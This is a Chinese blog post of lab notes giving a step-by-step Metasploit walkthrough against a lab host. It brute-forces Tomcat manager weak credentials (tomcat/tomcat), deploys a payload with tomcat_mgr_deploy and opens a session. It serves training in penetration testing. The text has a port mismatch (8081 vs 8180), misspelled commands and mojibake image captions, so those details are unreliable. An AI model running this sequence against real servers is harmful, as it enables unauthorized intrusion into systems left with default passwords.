Metasploit爆破Tomcat弱口令

  • Post author:
  • Post category:其他




声明:以下内容均来自“实验吧”免费公益渗透平台,该平台至今仍旧在维护,估计~~,为此把以前保留的笔记拿来分享下。






[实验目的]



1) 利用 Tomcat

弱口令漏洞

,破解出登陆密码,获得目标主机会话。





[实验原理]



1) 利用枚举的方法破解Tomcat的弱口令。





[实验环境]






[实验步骤]



一、利用nmap工具扫描目标主机


1.1 在终端中输入命令“

nmap –sV 192.168.1.3

”,对目标主机进行端口扫描,发现开放

8081

端口并且运行着ApacheTomcat/CoyoteJSP engine1.1。


我们其实也可以在URL 地址栏上进行验证,下面的图是在网上随意找的,仅供参考:(PS:有些网站会把Tomcat的默认端口8080改为8081)

å¨è¿éæå¥å¾çæè¿°


1.2 在终端中输入命令“msfconsole”,启动MSF终端。


1.3 在终端下输入命令“

search tomcat

”, 搜索tomcat的相关工具和攻击载荷。(下面的是截别人的图片清晰内容简洁,该工具的版本也相对的高一点,旧版本的参考我前面的博客)


(注意第

十四



exploit/multi/http/tomcat_mgr_deploy

后面的攻击需要用到)


1.4 在终端输入“

use


auxiliary


/scanner/http/tomcat_mgr_login

”, 启用漏洞利用模块, 提示符就会提示进入到该路径下。(该模块用来暴力破解)


1.5 在终端下输入“

set RHOSTS 192.168.1.3

”,设置攻击目标主机IP。


1.6 在终端下输入“

set RPORT 8180

”,设置攻击目标主机端口号.


1.7 在终端下输入“

exploit

”, 实施攻击。获得用户名

tomcat

,密码

tomcat




注意:由于我们没有自己设置用户名和密码文件,那么他会默认使用自己的默认用户名和密码文件,默认文件路径如图:


(命令:

show options




å¨è¿éæå¥å¾çæè¿°


1.8 在终端下输入“

use


exploit


/multi/http/tomcat_mgr_deploy

”, 启用漏洞利用模块, 提示符就会提示进入到该路径下。(该模块用来渗透)


1.9 在终端下输入“

set RHOST 192.168.1.3

”,设置攻击的目标主机IP。


1.10 在终端下输入“set RPORT 8180”,设置攻击的目标主机端口号。


1.11 在终端下输入“

set username tomcat

”,设置攻击时使用的登录账号tomcat。


1.12 在终端下输入“

set passsword tomcat

”,设置攻击时使用的密码tomcat。


1.13 在终端下输入“exploit”,开始攻击,建立会话。(注:从下面的信息中我们看到 Linux x86说明服务器是Linux系统)


1.14 在终端下输入“getuid”,查看获取的用户权限。


1.15 在终端下输入”help” ,查看可以使用的命令。





知识补充:



在学习的过程中我看到别的博主的测试和我的方法略微不同:



以下只展示部分图:(来自:


https://blog.csdn.net/weixin_42432317/article/details/90208213






use exploit/multi/http/tomcat_mgr_deploy

å¨è¿éæå¥å¾çæè¿°


show options

在这里插入图片描述


主要是set HTTPusername HTTPPassword 这两个参数与上方的实验不同,猜测与Metasploit的版本有关,因为实验吧的环境工具版本都比较低。

在这里插入图片描述

在这里插入图片描述


expolit

在这里插入图片描述



最后想说的是



Metasploit爆破tcpwrapped服务(514端口)这个也是采取的弱口令破解,具体自行百度,这里就不专门介绍了。




版权声明:本文为weixin_39934520原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。